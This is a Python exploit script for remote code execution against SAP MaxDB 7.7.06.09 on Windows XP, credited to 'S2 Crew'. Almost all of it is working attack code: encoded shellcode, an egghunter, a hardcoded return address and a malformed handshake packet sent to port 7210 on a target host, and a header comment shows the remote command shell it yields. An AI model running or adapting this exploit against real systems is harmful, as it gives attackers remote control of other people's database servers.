#!/usr/bin/python # Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution # Date: 2010.03.26 # Author: S2 Crew [Hungary] # Software link: sap.com # Version: 7.7.06.09 # Tested on: Windows XP SP2 EN # CVE: ZDI-10-032 # Code: ############################################################# # Trying 172.16.29.133... # Connected to 172.16.29.133. # Escape character is '^]'. # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\sdb\data\wrk> ############################################################# import socket import sys import os sc = ( "\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4" "\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff" "\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\xaf\x7e\x54" "\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\x99\x90\x7f" "\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\xec\x09\x42" "\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\x4e\xa8\x7c" "\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\x8b\x71\x8b" "\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\x56\x87\xbd" "\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\x3a\x62\x3e" "\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\xc6\xd0\x57" "\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\x1b\x5d\x87" "\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\x9a\xb6\xeb" "\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\x6a\x96\x10" "\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\x15\x45\xe1" "\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\x67\x67\x4d" "\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\x06\xb2\xe2" "\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\x1d\xbf\x85" "\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\x9d\x90\x09" "\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\xb2\x02\x81" "\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\xb2\xf5\x2d" "\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\x6f\x7e\xf0" "\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\x70\xa0\x74" "\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\xc0\x9c\xcb" "\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\x1e\x0b\x7a" "\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57") egghunter = ( "\x66\x81\xca\xff\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x54\x30\x30\x57\x8b\xfa" "\xaf\x75\xea\xaf\x75\xe7\xff\xe7" ) host = "172.16.29.133" port = 7210 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) ret = "\x08\xf1\xa0\x00" # HC packet = ( "\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00" "\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00" "\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff" "\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x07\x49" + "A"*5000 + "T00WT00W" + sc + "\x41" * 2500 + egghunter + "\x90"*2500) s.send(packet) s.close()